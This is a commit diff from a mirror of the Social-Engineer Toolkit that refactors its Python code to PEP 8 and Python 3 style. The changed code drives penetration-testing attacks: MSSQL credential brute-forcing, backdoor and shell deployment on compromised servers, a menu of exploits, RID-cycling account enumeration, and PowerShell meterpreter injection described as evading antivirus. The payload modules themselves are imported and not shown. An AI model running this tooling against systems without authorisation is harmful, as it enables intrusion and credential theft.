mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2024-12-15 07:22:33 +00:00
pep8 and python3 refactoring
This commit is contained in:
parent
262fe6ffed
commit
723613f3ea
5 changed files with 457 additions and 344 deletions
|
@ -33,49 +33,63 @@ try:
|
||||||
# take input here
|
# take input here
|
||||||
attack_vector_sql = raw_input(setprompt(["19", "21"], ""))
|
attack_vector_sql = raw_input(setprompt(["19", "21"], ""))
|
||||||
|
|
||||||
|
|
||||||
#
|
#
|
||||||
# option 1 scan and attack, option 2 connect directly to mssql
|
# option 1 scan and attack, option 2 connect directly to mssql
|
||||||
# if 1, start scan and attack
|
# if 1, start scan and attack
|
||||||
#
|
#
|
||||||
if attack_vector_sql == '1':
|
if attack_vector_sql == '1':
|
||||||
print "\nHere you can select either a CIDR notation/IP Address or a filename\nthat contains a list of IP Addresses.\n\nFormat for a file would be similar to this:\n\n192.168.13.25\n192.168.13.26\n192.168.13.26\n\n1. Scan IP address or CIDR\n2. Import file that contains SQL Server IP addresses\n"
|
print("\nHere you can select either a CIDR notation/IP Address or a filename\nthat contains a list of IP Addresses.\n\nFormat for a file would be similar to this:\n\n192.168.13.25\n192.168.13.26\n192.168.13.26\n\n1. Scan IP address or CIDR\n2. Import file that contains SQL Server IP addresses\n")
|
||||||
choice = raw_input(setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))
|
choice = raw_input(
|
||||||
|
setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))
|
||||||
if choice != "1":
|
if choice != "1":
|
||||||
if choice != "2":
|
if choice != "2":
|
||||||
if choice != "":
|
if choice != "":
|
||||||
print_error("You did not specify 1 or 2! Please try again.")
|
print_error(
|
||||||
choice =raw_input(setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))
|
"You did not specify 1 or 2! Please try again.")
|
||||||
|
choice = raw_input(
|
||||||
|
setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))
|
||||||
# grab ip address
|
# grab ip address
|
||||||
if choice == "": choice = "1"
|
if choice == "":
|
||||||
|
choice = "1"
|
||||||
if choice == "1":
|
if choice == "1":
|
||||||
range = raw_input(setprompt(["19","21","22"], "Enter the CIDR or single IP (ex. 192.168.1.1/24)"))
|
range = raw_input(setprompt(
|
||||||
|
["19", "21", "22"], "Enter the CIDR or single IP (ex. 192.168.1.1/24)"))
|
||||||
if choice == "2":
|
if choice == "2":
|
||||||
while 1:
|
while 1:
|
||||||
range = raw_input(setprompt(["19","21","22"], "Enter filename for SQL servers (ex. /root/sql.txt - note can be in format of ipaddr:port)"))
|
range = raw_input(setprompt(
|
||||||
|
["19", "21", "22"], "Enter filename for SQL servers (ex. /root/sql.txt - note can be in format of ipaddr:port)"))
|
||||||
if not os.path.isfile(range):
|
if not os.path.isfile(range):
|
||||||
print_error("File not found! Please type in the path to the file correctly.")
|
print_error(
|
||||||
|
"File not found! Please type in the path to the file correctly.")
|
||||||
else:
|
else:
|
||||||
break
|
break
|
||||||
if choice == "1": port = "1433"
|
if choice == "1":
|
||||||
if choice == "2": port = "1433"
|
port = "1433"
|
||||||
|
if choice == "2":
|
||||||
|
port = "1433"
|
||||||
# ask for a wordlist
|
# ask for a wordlist
|
||||||
wordlist = raw_input(setprompt(["19","21","22"], "Enter path to a wordlist file [use default wordlist]"))
|
wordlist = raw_input(setprompt(
|
||||||
if wordlist == "": wordlist = "default"
|
["19", "21", "22"], "Enter path to a wordlist file [use default wordlist]"))
|
||||||
|
if wordlist == "":
|
||||||
|
wordlist = "default"
|
||||||
# specify the user to brute force
|
# specify the user to brute force
|
||||||
username = raw_input(setprompt(["19","21","22"], "Enter the username to brute force or specify username file (/root/users.txt) [sa]"))
|
username = raw_input(setprompt(
|
||||||
|
["19", "21", "22"], "Enter the username to brute force or specify username file (/root/users.txt) [sa]"))
|
||||||
# default to sa
|
# default to sa
|
||||||
if username == "": username = "sa"
|
if username == "":
|
||||||
|
username = "sa"
|
||||||
if username != "sa":
|
if username != "sa":
|
||||||
if not os.path.isfile(username):
|
if not os.path.isfile(username):
|
||||||
print_status("If you were using a file, its not found, using text as username.")
|
print_status(
|
||||||
|
"If you were using a file, its not found, using text as username.")
|
||||||
# import the mssql module from fasttrack
|
# import the mssql module from fasttrack
|
||||||
from src.fasttrack import mssql
|
from src.fasttrack import mssql
|
||||||
# choice from earlier if we want to use a filelist or whatnot
|
# choice from earlier if we want to use a filelist or whatnot
|
||||||
if choice != "2":
|
if choice != "2":
|
||||||
# sql_servers
|
# sql_servers
|
||||||
sql_servers = ''
|
sql_servers = ''
|
||||||
print_status("Hunting for SQL servers.. This may take a little bit.")
|
print_status(
|
||||||
|
"Hunting for SQL servers.. This may take a little bit.")
|
||||||
if "/" in str(range):
|
if "/" in str(range):
|
||||||
iprange = printCIDR(range)
|
iprange = printCIDR(range)
|
||||||
iprange = iprange.split(",")
|
iprange = iprange.split(",")
|
||||||
|
@ -84,7 +98,8 @@ try:
|
||||||
if sqlport != None:
|
if sqlport != None:
|
||||||
sql_servers = sql_servers + host + ":" + sqlport + ","
|
sql_servers = sql_servers + host + ":" + sqlport + ","
|
||||||
else:
|
else:
|
||||||
# use udp discovery to get the SQL server IDP through 1434
|
# use udp discovery to get the SQL server IDP through
|
||||||
|
# 1434
|
||||||
sqlport = get_sql_port(range)
|
sqlport = get_sql_port(range)
|
||||||
# UDP could be closed - defaulting to 1433
|
# UDP could be closed - defaulting to 1433
|
||||||
if sqlport != None:
|
if sqlport != None:
|
||||||
|
@ -94,10 +109,13 @@ try:
|
||||||
if choice == "2":
|
if choice == "2":
|
||||||
if not os.path.isfile(range):
|
if not os.path.isfile(range):
|
||||||
while 1:
|
while 1:
|
||||||
print_warning("Sorry boss. The file was not found. Try again")
|
print_warning(
|
||||||
range = raw_input(setprompt(["19","21", "22"], "Enter the CIDR, single, IP, or file with IP addresses (ex. 192.168.1.1/24)"))
|
"Sorry boss. The file was not found. Try again")
|
||||||
|
range = raw_input(setprompt(
|
||||||
|
["19", "21", "22"], "Enter the CIDR, single, IP, or file with IP addresses (ex. 192.168.1.1/24)"))
|
||||||
if os.path.isfile(range):
|
if os.path.isfile(range):
|
||||||
print_status("Atta boy. Found the file this time. Moving on.")
|
print_status(
|
||||||
|
"Atta boy. Found the file this time. Moving on.")
|
||||||
break
|
break
|
||||||
|
|
||||||
fileopen = file(range, "r").readlines()
|
fileopen = file(range, "r").readlines()
|
||||||
|
@ -122,13 +140,17 @@ try:
|
||||||
# start loop and brute force
|
# start loop and brute force
|
||||||
for servers in sql_servers:
|
for servers in sql_servers:
|
||||||
|
|
||||||
# this will return the following format ipaddr + "," + username + "," + str(port) + "," + passwords
|
# this will return the following format ipaddr + "," +
|
||||||
|
# username + "," + str(port) + "," + passwords
|
||||||
if servers != "":
|
if servers != "":
|
||||||
# if we aren't using a username file
|
# if we aren't using a username file
|
||||||
if not os.path.isfile(username):
|
if not os.path.isfile(username):
|
||||||
sql_success = mssql.brute(servers, username, port, wordlist)
|
sql_success = mssql.brute(
|
||||||
|
servers, username, port, wordlist)
|
||||||
if sql_success != False:
|
if sql_success != False:
|
||||||
# after each success or fail it will break into this to the above with a newline to be parsed later
|
# after each success or fail it will break
|
||||||
|
# into this to the above with a newline to
|
||||||
|
# be parsed later
|
||||||
master_list = master_list + sql_success + ":"
|
master_list = master_list + sql_success + ":"
|
||||||
counter = 1
|
counter = 1
|
||||||
|
|
||||||
|
@ -136,16 +158,20 @@ try:
|
||||||
if os.path.isfile(username):
|
if os.path.isfile(username):
|
||||||
for users in usernames:
|
for users in usernames:
|
||||||
users = users.rstrip()
|
users = users.rstrip()
|
||||||
sql_success = mssql.brute(servers, users, port, wordlist)
|
sql_success = mssql.brute(
|
||||||
# we wont break out of the loop here incase theres multiple usernames we want to find
|
servers, users, port, wordlist)
|
||||||
|
# we wont break out of the loop here incase
|
||||||
|
# theres multiple usernames we want to find
|
||||||
if sql_success != False:
|
if sql_success != False:
|
||||||
master_list = master_list + sql_success + ":"
|
master_list = master_list + sql_success + ":"
|
||||||
counter = 1
|
counter = 1
|
||||||
|
|
||||||
# if we didn't successful attack one
|
# if we didn't successful attack one
|
||||||
if counter == 0:
|
if counter == 0:
|
||||||
print_warning("Sorry. Unable to locate or fully compromise a MSSQL Server.")
|
print_warning(
|
||||||
pause = raw_input("Press {return} to continue to the main menu.")
|
"Sorry. Unable to locate or fully compromise a MSSQL Server.")
|
||||||
|
pause = raw_input(
|
||||||
|
"Press {return} to continue to the main menu.")
|
||||||
# if we successfully attacked one
|
# if we successfully attacked one
|
||||||
if counter == 1:
|
if counter == 1:
|
||||||
# need to loop to keep menu going
|
# need to loop to keep menu going
|
||||||
|
@ -154,23 +180,29 @@ try:
|
||||||
counter = 1
|
counter = 1
|
||||||
# here we list the servers we compromised
|
# here we list the servers we compromised
|
||||||
master_names = master_list.split(":")
|
master_names = master_list.split(":")
|
||||||
print_status("Select the compromise SQL server you want to interact with:\n")
|
print_status(
|
||||||
|
"Select the compromise SQL server you want to interact with:\n")
|
||||||
for success in master_names:
|
for success in master_names:
|
||||||
if success != "":
|
if success != "":
|
||||||
success = success.rstrip()
|
success = success.rstrip()
|
||||||
success = success.split(",")
|
success = success.split(",")
|
||||||
success= bcolors.BOLD + success[0] + bcolors.ENDC + " username: " + bcolors.BOLD + "%s" % (success[1]) + bcolors.ENDC + " | password: " + bcolors.BOLD + "%s" % (success[3]) + bcolors.ENDC + " SQLPort: " + bcolors.BOLD + "%s" % (success[2]) + bcolors.ENDC
|
success = bcolors.BOLD + success[0] + bcolors.ENDC + " username: " + bcolors.BOLD + "%s" % (success[1]) + bcolors.ENDC + " | password: " + bcolors.BOLD + "%s" % (success[
|
||||||
print " " + str(counter) + ". " + success
|
3]) + bcolors.ENDC + " SQLPort: " + bcolors.BOLD + "%s" % (success[2]) + bcolors.ENDC
|
||||||
|
print(" " + str(counter) + ". " + success)
|
||||||
# increment counter
|
# increment counter
|
||||||
counter = counter + 1
|
counter = counter + 1
|
||||||
|
|
||||||
print "\n 99. Return back to the main menu.\n"
|
print("\n 99. Return back to the main menu.\n")
|
||||||
# select the server to interact with
|
# select the server to interact with
|
||||||
select_server = raw_input(setprompt(["19","21","22"], "Select the SQL server to interact with [1]"))
|
select_server = raw_input(
|
||||||
|
setprompt(["19", "21", "22"], "Select the SQL server to interact with [1]"))
|
||||||
# default 1
|
# default 1
|
||||||
if select_server == "quit" or select_server == "exit": break
|
if select_server == "quit" or select_server == "exit":
|
||||||
if select_server == "": select_server = "1"
|
break
|
||||||
if select_server == "99": break
|
if select_server == "":
|
||||||
|
select_server = "1"
|
||||||
|
if select_server == "99":
|
||||||
|
break
|
||||||
counter = 1
|
counter = 1
|
||||||
for success in master_names:
|
for success in master_names:
|
||||||
if success != "":
|
if success != "":
|
||||||
|
@ -179,22 +211,30 @@ try:
|
||||||
# if we equal the number used above
|
# if we equal the number used above
|
||||||
if counter == int(select_server):
|
if counter == int(select_server):
|
||||||
# ipaddr + "," + username + "," + str(port) + "," + passwords
|
# ipaddr + "," + username + "," + str(port) + "," + passwords
|
||||||
print "\nHow do you want to deploy the binary via debug (win2k, winxp, win2003) and/or powershell (vista,win7,2008,2012) or just a shell\n\n 1. Deploy Backdoor to System\n 2. Standard Windows Shell\n\n 99. Return back to the main menu.\n"
|
print("\nHow do you want to deploy the binary via debug (win2k, winxp, win2003) and/or powershell (vista,win7,2008,2012) or just a shell\n\n 1. Deploy Backdoor to System\n 2. Standard Windows Shell\n\n 99. Return back to the main menu.\n")
|
||||||
option = raw_input(setprompt(["19","21","22"], "Which deployment option do you want [1]"))
|
option = raw_input(
|
||||||
if option == "": option = "1"
|
setprompt(["19", "21", "22"], "Which deployment option do you want [1]"))
|
||||||
|
if option == "":
|
||||||
|
option = "1"
|
||||||
# if 99 then break
|
# if 99 then break
|
||||||
if option == "99": break
|
if option == "99":
|
||||||
# specify we are using the fasttrack option, this disables some features
|
break
|
||||||
filewrite = file(setdir + "/fasttrack.options", "w")
|
# specify we are using the fasttrack
|
||||||
|
# option, this disables some features
|
||||||
|
filewrite = file(
|
||||||
|
setdir + "/fasttrack.options", "w")
|
||||||
filewrite.write("none")
|
filewrite.write("none")
|
||||||
filewrite.close()
|
filewrite.close()
|
||||||
# import fasttrack
|
# import fasttrack
|
||||||
if option == "1":
|
if option == "1":
|
||||||
# import payloads for selection and prep
|
# import payloads for selection and
|
||||||
mssql.deploy_hex2binary(success[0], success[2], success[1], success[3])
|
# prep
|
||||||
|
mssql.deploy_hex2binary(
|
||||||
|
success[0], success[2], success[1], success[3])
|
||||||
# straight up connect
|
# straight up connect
|
||||||
if option == "2":
|
if option == "2":
|
||||||
mssql.cmdshell(success[0], success[2], success[1], success[3], option)
|
mssql.cmdshell(success[0], success[2], success[
|
||||||
|
1], success[3], option)
|
||||||
# increment counter
|
# increment counter
|
||||||
counter = counter + 1
|
counter = counter + 1
|
||||||
|
|
||||||
|
@ -202,51 +242,59 @@ try:
|
||||||
# if we want to connect directly to a SQL server
|
# if we want to connect directly to a SQL server
|
||||||
#
|
#
|
||||||
if attack_vector_sql == "2":
|
if attack_vector_sql == "2":
|
||||||
sql_server = raw_input(setprompt(["19","21","23"], "Enter the hostname or IP address of the SQL server"))
|
sql_server = raw_input(setprompt(
|
||||||
sql_port = raw_input(setprompt(["19","21","23"], "Enter the SQL port to connect [1433]"))
|
["19", "21", "23"], "Enter the hostname or IP address of the SQL server"))
|
||||||
if sql_port == "": sql_port = "1433"
|
sql_port = raw_input(
|
||||||
sql_username = raw_input(setprompt(["19","21","23"], "Enter the username of the SQL Server [sa]"))
|
setprompt(["19", "21", "23"], "Enter the SQL port to connect [1433]"))
|
||||||
|
if sql_port == "":
|
||||||
|
sql_port = "1433"
|
||||||
|
sql_username = raw_input(
|
||||||
|
setprompt(["19", "21", "23"], "Enter the username of the SQL Server [sa]"))
|
||||||
# default to sa
|
# default to sa
|
||||||
if sql_username == "": sql_username = "sa"
|
if sql_username == "":
|
||||||
sql_password = raw_input(setprompt(["19","21","23"], "Enter the password for the SQL server"))
|
sql_username = "sa"
|
||||||
|
sql_password = raw_input(
|
||||||
|
setprompt(["19", "21", "23"], "Enter the password for the SQL server"))
|
||||||
print_status("Connecting to the SQL server...")
|
print_status("Connecting to the SQL server...")
|
||||||
# try connecting
|
# try connecting
|
||||||
# establish base counter for connection
|
# establish base counter for connection
|
||||||
counter = 0
|
counter = 0
|
||||||
try:
|
try:
|
||||||
import _mssql
|
import _mssql
|
||||||
conn = _mssql.connect(sql_server + ":" + str(sql_port), sql_username, sql_password)
|
conn = _mssql.connect(
|
||||||
|
sql_server + ":" + str(sql_port), sql_username, sql_password)
|
||||||
counter = 1
|
counter = 1
|
||||||
except Exception, e:
|
except Exception as e:
|
||||||
print e
|
print(e)
|
||||||
print_error("Connection to SQL Server failed. Try again.")
|
print_error("Connection to SQL Server failed. Try again.")
|
||||||
# if we had a successful connection
|
# if we had a successful connection
|
||||||
if counter == 1:
|
if counter == 1:
|
||||||
print_status("Dropping into a SQL shell. Type quit to exit.")
|
print_status(
|
||||||
|
"Dropping into a SQL shell. Type quit to exit.")
|
||||||
# loop forever
|
# loop forever
|
||||||
while 1:
|
while 1:
|
||||||
# enter the sql command
|
# enter the sql command
|
||||||
sql_shell = raw_input("Enter your SQL command here: ")
|
sql_shell = raw_input("Enter your SQL command here: ")
|
||||||
if sql_shell == "quit" or sql_shell == "exit":
|
if sql_shell == "quit" or sql_shell == "exit":
|
||||||
print_status("Exiting the SQL shell and returning to menu.")
|
print_status(
|
||||||
|
"Exiting the SQL shell and returning to menu.")
|
||||||
break
|
break
|
||||||
|
|
||||||
try:
|
try:
|
||||||
# execute the query
|
# execute the query
|
||||||
sql_query = conn.execute_query(sql_shell)
|
sql_query = conn.execute_query(sql_shell)
|
||||||
# return results
|
# return results
|
||||||
print "\n"
|
print("\n")
|
||||||
for data in conn:
|
for data in conn:
|
||||||
data = str(data)
|
data = str(data)
|
||||||
data = data.replace("\\n\\t", "\n")
|
data = data.replace("\\n\\t", "\n")
|
||||||
data = data.replace("\\n", "\n")
|
data = data.replace("\\n", "\n")
|
||||||
data = data.replace("{0: '", "")
|
data = data.replace("{0: '", "")
|
||||||
data = data.replace("'}", "")
|
data = data.replace("'}", "")
|
||||||
print data
|
print(data)
|
||||||
except Exception, e:
|
except Exception as e:
|
||||||
print_warning("\nIncorrect syntax somewhere. Printing error message: " + str(e))
|
print_warning(
|
||||||
|
"\nIncorrect syntax somewhere. Printing error message: " + str(e))
|
||||||
|
|
||||||
|
|
||||||
##################################
|
##################################
|
||||||
##################################
|
##################################
|
||||||
|
@ -255,36 +303,50 @@ try:
|
||||||
##################################
|
##################################
|
||||||
if attack_vector == "2":
|
if attack_vector == "2":
|
||||||
# start the menu
|
# start the menu
|
||||||
create_menu(text.fasttrack_exploits_text1, text.fasttrack_exploits_menu1)
|
create_menu(text.fasttrack_exploits_text1,
|
||||||
|
text.fasttrack_exploits_menu1)
|
||||||
# enter the exploits menu here
|
# enter the exploits menu here
|
||||||
range = raw_input(setprompt(["19","24"], "Select the number of the exploit you want"))
|
range = raw_input(
|
||||||
|
setprompt(["19", "24"], "Select the number of the exploit you want"))
|
||||||
|
|
||||||
# ms08067
|
# ms08067
|
||||||
if range == "1":
|
if range == "1":
|
||||||
try: reload(src.fasttrack.exploits.ms08067)
|
try:
|
||||||
except: import src.fasttrack.exploits.ms08067
|
reload(src.fasttrack.exploits.ms08067)
|
||||||
|
except:
|
||||||
|
import src.fasttrack.exploits.ms08067
|
||||||
|
|
||||||
# firefox 3.6.16
|
# firefox 3.6.16
|
||||||
if range == "2":
|
if range == "2":
|
||||||
try: reload(src.fasttrack.exploits.firefox_3_6_16)
|
try:
|
||||||
except: import src.fasttrack.exploits.firefox_3_6_16
|
reload(src.fasttrack.exploits.firefox_3_6_16)
|
||||||
|
except:
|
||||||
|
import src.fasttrack.exploits.firefox_3_6_16
|
||||||
# solarwinds
|
# solarwinds
|
||||||
if range == "3":
|
if range == "3":
|
||||||
try: reload(src.fasttrack.exploits.solarwinds)
|
try:
|
||||||
except: import src.fasttrack.exploits.solarwinds
|
reload(src.fasttrack.exploits.solarwinds)
|
||||||
|
except:
|
||||||
|
import src.fasttrack.exploits.solarwinds
|
||||||
|
|
||||||
# rdp DoS
|
# rdp DoS
|
||||||
if range == "4":
|
if range == "4":
|
||||||
try: reload(src.fasttrack.exploits.rdpdos)
|
try:
|
||||||
except: import src.fasttrack.exploits.rdpdos
|
reload(src.fasttrack.exploits.rdpdos)
|
||||||
|
except:
|
||||||
|
import src.fasttrack.exploits.rdpdos
|
||||||
|
|
||||||
if range == "5":
|
if range == "5":
|
||||||
try: reload(src.fasttrack.exploits.mysql_bypass)
|
try:
|
||||||
except: import src.fasttrack.exploits.mysql_bypass
|
reload(src.fasttrack.exploits.mysql_bypass)
|
||||||
|
except:
|
||||||
|
import src.fasttrack.exploits.mysql_bypass
|
||||||
|
|
||||||
if range == "6":
|
if range == "6":
|
||||||
try: reload(src.fasttrack.exploits.f5)
|
try:
|
||||||
except: import src.fasttrack.exploits.f5
|
reload(src.fasttrack.exploits.f5)
|
||||||
|
except:
|
||||||
|
import src.fasttrack.exploits.f5
|
||||||
|
|
||||||
##################################
|
##################################
|
||||||
##################################
|
##################################
|
||||||
|
@ -293,9 +355,10 @@ try:
|
||||||
##################################
|
##################################
|
||||||
if attack_vector == "3":
|
if attack_vector == "3":
|
||||||
# load sccm attack
|
# load sccm attack
|
||||||
try: reload(src.fasttrack.sccm.sccm_main)
|
try:
|
||||||
except: import src.fasttrack.sccm.sccm_main
|
reload(src.fasttrack.sccm.sccm_main)
|
||||||
|
except:
|
||||||
|
import src.fasttrack.sccm.sccm_main
|
||||||
|
|
||||||
##################################
|
##################################
|
||||||
##################################
|
##################################
|
||||||
|
@ -304,8 +367,8 @@ try:
|
||||||
##################################
|
##################################
|
||||||
if attack_vector == "4":
|
if attack_vector == "4":
|
||||||
# load drac menu
|
# load drac menu
|
||||||
subprocess.Popen("python %s/src/fasttrack/delldrac.py" % (definepath), shell=True).wait()
|
subprocess.Popen("python %s/src/fasttrack/delldrac.py" %
|
||||||
|
(definepath), shell=True).wait()
|
||||||
|
|
||||||
##################################
|
##################################
|
||||||
##################################
|
##################################
|
||||||
|
@ -321,13 +384,16 @@ try:
|
||||||
| _| `._____||__| |_______/ _____|_______||__| \__| \______/ |__| |__|
|
| _| `._____||__| |_______/ _____|_______||__| \__| \______/ |__| |__|
|
||||||
|______|
|
|______|
|
||||||
""")
|
""")
|
||||||
print "\nRID_ENUM is a tool that will enumerate user accounts through a rid cycling attack through null sessions. In\norder for this to work, the remote server will need to have null sessions enabled. In most cases, you would use\nthis against a domain controller on an internal penetration test. You do not need to provide credentials, it will\nattempt to enumerate the base RID address and then cycle through 500 (Administrator) to whatever RID you want."
|
print("\nRID_ENUM is a tool that will enumerate user accounts through a rid cycling attack through null sessions. In\norder for this to work, the remote server will need to have null sessions enabled. In most cases, you would use\nthis against a domain controller on an internal penetration test. You do not need to provide credentials, it will\nattempt to enumerate the base RID address and then cycle through 500 (Administrator) to whatever RID you want.")
|
||||||
print "\n"
|
print("\n")
|
||||||
ipaddr = raw_input(setprompt(["31"], "Enter the IP address of server (or quit to exit)"))
|
ipaddr = raw_input(
|
||||||
|
setprompt(["31"], "Enter the IP address of server (or quit to exit)"))
|
||||||
if ipaddr == "99" or ipaddr == "quit" or ipaddr == "exit":
|
if ipaddr == "99" or ipaddr == "quit" or ipaddr == "exit":
|
||||||
break
|
break
|
||||||
print_status("Next you can automatically brute force the user accounts. If you do not want to brute force, type no at the next prompt")
|
print_status(
|
||||||
dict = raw_input(setprompt(["31"], "Enter path to dictionary file to brute force [enter for built in]"))
|
"Next you can automatically brute force the user accounts. If you do not want to brute force, type no at the next prompt")
|
||||||
|
dict = raw_input(setprompt(
|
||||||
|
["31"], "Enter path to dictionary file to brute force [enter for built in]"))
|
||||||
# if we are using the built in one
|
# if we are using the built in one
|
||||||
if dict == "":
|
if dict == "":
|
||||||
# write out a file
|
# write out a file
|
||||||
|
@ -343,20 +409,29 @@ try:
|
||||||
dict = ""
|
dict = ""
|
||||||
|
|
||||||
if dict != "":
|
if dict != "":
|
||||||
print_warning("You are about to brute force user accounts, be careful for lockouts.")
|
print_warning(
|
||||||
choice = raw_input(setprompt(["31"], "Are you sure you want to brute force [yes/no]"))
|
"You are about to brute force user accounts, be careful for lockouts.")
|
||||||
|
choice = raw_input(
|
||||||
|
setprompt(["31"], "Are you sure you want to brute force [yes/no]"))
|
||||||
if choice.lower() == "n" or choice.lower() == "no":
|
if choice.lower() == "n" or choice.lower() == "no":
|
||||||
print_status("Okay. Not brute forcing user accounts *phew*.")
|
print_status(
|
||||||
|
"Okay. Not brute forcing user accounts *phew*.")
|
||||||
dict = ""
|
dict = ""
|
||||||
|
|
||||||
# next we see what rid we want to start
|
# next we see what rid we want to start
|
||||||
start_rid = raw_input(setprompt(["31"], "What RID do you want to start at [500]"))
|
start_rid = raw_input(
|
||||||
if start_rid == "": start_rid = "500"
|
setprompt(["31"], "What RID do you want to start at [500]"))
|
||||||
|
if start_rid == "":
|
||||||
|
start_rid = "500"
|
||||||
# stop rid
|
# stop rid
|
||||||
stop_rid = raw_input(setprompt(["31"], "What RID do you want to stop at [15000]"))
|
stop_rid = raw_input(
|
||||||
if stop_rid == "": stop_rid = "15000"
|
setprompt(["31"], "What RID do you want to stop at [15000]"))
|
||||||
print_status("Launching RID_ENUM to start enumerating user accounts...")
|
if stop_rid == "":
|
||||||
subprocess.Popen("python src/fasttrack/rid_enum.py %s %s %s %s" % (ipaddr,start_rid,stop_rid,dict), shell=True).wait()
|
stop_rid = "15000"
|
||||||
|
print_status(
|
||||||
|
"Launching RID_ENUM to start enumerating user accounts...")
|
||||||
|
subprocess.Popen("python src/fasttrack/rid_enum.py %s %s %s %s" %
|
||||||
|
(ipaddr, start_rid, stop_rid, dict), shell=True).wait()
|
||||||
|
|
||||||
# once we are finished, prompt.
|
# once we are finished, prompt.
|
||||||
print_status("Everything is finished!")
|
print_status("Everything is finished!")
|
||||||
|
@ -368,9 +443,11 @@ try:
|
||||||
##################################
|
##################################
|
||||||
##################################
|
##################################
|
||||||
if attack_vector == "6":
|
if attack_vector == "6":
|
||||||
print "\nPSEXEC Powershell Injection Attack:\n\nThis attack will inject a meterpreter backdoor through powershell memory injection. This will circumvent\nAnti-Virus since we will never touch disk. Will require Powershell to be installed on the remote victim\nmachine. You can use either straight passwords or hash values.\n"
|
print("\nPSEXEC Powershell Injection Attack:\n\nThis attack will inject a meterpreter backdoor through powershell memory injection. This will circumvent\nAnti-Virus since we will never touch disk. Will require Powershell to be installed on the remote victim\nmachine. You can use either straight passwords or hash values.\n")
|
||||||
try: reload(src.fasttrack.psexec)
|
try:
|
||||||
except: import src.fasttrack.psexec
|
reload(src.fasttrack.psexec)
|
||||||
|
except:
|
||||||
|
import src.fasttrack.psexec
|
||||||
|
|
||||||
# handle keyboard exceptions
|
# handle keyboard exceptions
|
||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
|
|
|
@ -1,6 +1,6 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
## module_handler.py
|
# module_handler.py
|
||||||
|
|
||||||
import glob
|
import glob
|
||||||
import re
|
import re
|
||||||
|
@ -14,9 +14,10 @@ menu_return = "false"
|
||||||
counter = 0
|
counter = 0
|
||||||
|
|
||||||
# get the menu going
|
# get the menu going
|
||||||
print "\n"
|
print("\n")
|
||||||
print_info_spaces("Social-Engineer Toolkit Third Party Modules menu.")
|
print_info_spaces("Social-Engineer Toolkit Third Party Modules menu.")
|
||||||
print_info_spaces("Please read the readme/modules.txt for information on how to create your own modules.\n")
|
print_info_spaces(
|
||||||
|
"Please read the readme/modules.txt for information on how to create your own modules.\n")
|
||||||
|
|
||||||
for name in glob.glob("modules/*.py"):
|
for name in glob.glob("modules/*.py"):
|
||||||
|
|
||||||
|
@ -30,9 +31,9 @@ for name in glob.glob("modules/*.py"):
|
||||||
line = line.replace('MAIN="', "")
|
line = line.replace('MAIN="', "")
|
||||||
line = line.replace('"', "")
|
line = line.replace('"', "")
|
||||||
line = " " + str(counter) + ". " + line
|
line = " " + str(counter) + ". " + line
|
||||||
print line
|
print(line)
|
||||||
|
|
||||||
print "\n 99. Return to the previous menu\n"
|
print("\n 99. Return to the previous menu\n")
|
||||||
choice = raw_input(setprompt(["9"], ""))
|
choice = raw_input(setprompt(["9"], ""))
|
||||||
|
|
||||||
if choice == 'exit':
|
if choice == 'exit':
|
||||||
|
@ -76,6 +77,6 @@ if menu_return == "false":
|
||||||
try:
|
try:
|
||||||
exec("%s.main()" % (name))
|
exec("%s.main()" % (name))
|
||||||
# handle the exception if main isn't there
|
# handle the exception if main isn't there
|
||||||
except Exception, e:
|
except Exception as e:
|
||||||
raw_input(" [!] There was an issue with a module: %s." % (e))
|
raw_input(" [!] There was an issue with a module: %s." % (e))
|
||||||
return_continue()
|
return_continue()
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
#!/usr/bin/python
|
#!/usr/bin/python
|
||||||
## PDF spear phishing attack here
|
# PDF spear phishing attack here
|
||||||
|
|
||||||
import subprocess
|
import subprocess
|
||||||
import re
|
import re
|
||||||
|
@ -20,7 +20,7 @@ users_home = os.getenv("HOME")
|
||||||
# metasploit path
|
# metasploit path
|
||||||
meta_path = meta_path()
|
meta_path = meta_path()
|
||||||
|
|
||||||
print meta_path
|
print(meta_path)
|
||||||
|
|
||||||
# define if we need apache or not for dll hijacking
|
# define if we need apache or not for dll hijacking
|
||||||
# define if use apache or not
|
# define if use apache or not
|
||||||
|
@ -44,7 +44,8 @@ for line in apache_check:
|
||||||
line2 = line2.rstrip()
|
line2 = line2.rstrip()
|
||||||
apache_path = line2.replace("APACHE_DIRECTORY=", "")
|
apache_path = line2.replace("APACHE_DIRECTORY=", "")
|
||||||
apache = 1
|
apache = 1
|
||||||
if os.path.isdir(apache_path + "/html"): apache_path = apache_path + "/html"
|
if os.path.isdir(apache_path + "/html"):
|
||||||
|
apache_path = apache_path + "/html"
|
||||||
|
|
||||||
###################################################
|
###################################################
|
||||||
# USER INPUT: SHOW PAYLOAD MENU #
|
# USER INPUT: SHOW PAYLOAD MENU #
|
||||||
|
@ -54,9 +55,10 @@ target=""
|
||||||
exploit = "INVALID"
|
exploit = "INVALID"
|
||||||
while exploit == "INVALID":
|
while exploit == "INVALID":
|
||||||
debug_msg(me, "printing 'src.core.menu.text.create_payloads_menu'", 5)
|
debug_msg(me, "printing 'src.core.menu.text.create_payloads_menu'", 5)
|
||||||
show_payload_menu1 = create_menu(create_payloads_text, create_payloads_menu)
|
show_payload_menu1 = create_menu(
|
||||||
|
create_payloads_text, create_payloads_menu)
|
||||||
exploit = raw_input(setprompt(["4"], ""))
|
exploit = raw_input(setprompt(["4"], ""))
|
||||||
print "\n"
|
print("\n")
|
||||||
|
|
||||||
# Do conditional checks for the value of 'exploit', which should be a number
|
# Do conditional checks for the value of 'exploit', which should be a number
|
||||||
# Handle any additional tasks before doing the dictionary lookup and
|
# Handle any additional tasks before doing the dictionary lookup and
|
||||||
|
@ -67,12 +69,14 @@ while exploit == "INVALID":
|
||||||
exit_set()
|
exit_set()
|
||||||
|
|
||||||
if exploit == "":
|
if exploit == "":
|
||||||
exploit='1' # 'SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)'
|
# 'SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)'
|
||||||
|
exploit = '1'
|
||||||
|
|
||||||
